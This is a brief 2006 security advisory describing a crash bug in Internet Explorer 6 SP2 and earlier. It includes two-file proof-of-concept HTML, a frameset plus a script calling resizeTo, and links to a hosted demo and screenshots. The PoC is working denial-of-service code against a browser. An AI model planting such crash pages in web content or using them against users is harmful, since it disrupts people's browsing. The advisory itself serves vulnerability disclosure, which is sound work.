Title: [Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability Author: Kil13r - http://www.kil13r.info/ Local / Remote: Both Timeline: 2003/12/28 - Discovery 2006/05/20 - Release 2006/06/05 - Update Affected version: Microsoft Internet Explorer 6 SP2 or earlier Not affected version: Microsoft Internet Explorer 7 Beta 2 Description: Microsoft Internet Explorer has bug that crashes when you click on the page. Proof of Concept code: 1) exploit_1.html <frameset cols="0%, *"> <frame src="exploit_2.html"> </frameset> 2) exploit_2.html <script> self.resizeTo(2003, 1228); </script> Proof of Concept example: http://www.kil13r.info/sa/iebug/exploit_1.html Proof of Concept screenshot: http://www.kil13r.info/sa/iebug/screenshot.jpg http://www.kil13r.info/sa/iebug/screenshot2.jpg
